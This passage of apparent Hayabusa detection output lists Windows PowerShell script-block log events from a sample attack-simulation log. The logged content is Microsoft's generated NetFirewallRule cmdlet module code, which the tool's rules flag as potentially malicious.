[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } 
} catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation 
and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"face', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' -Alias '*' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] 
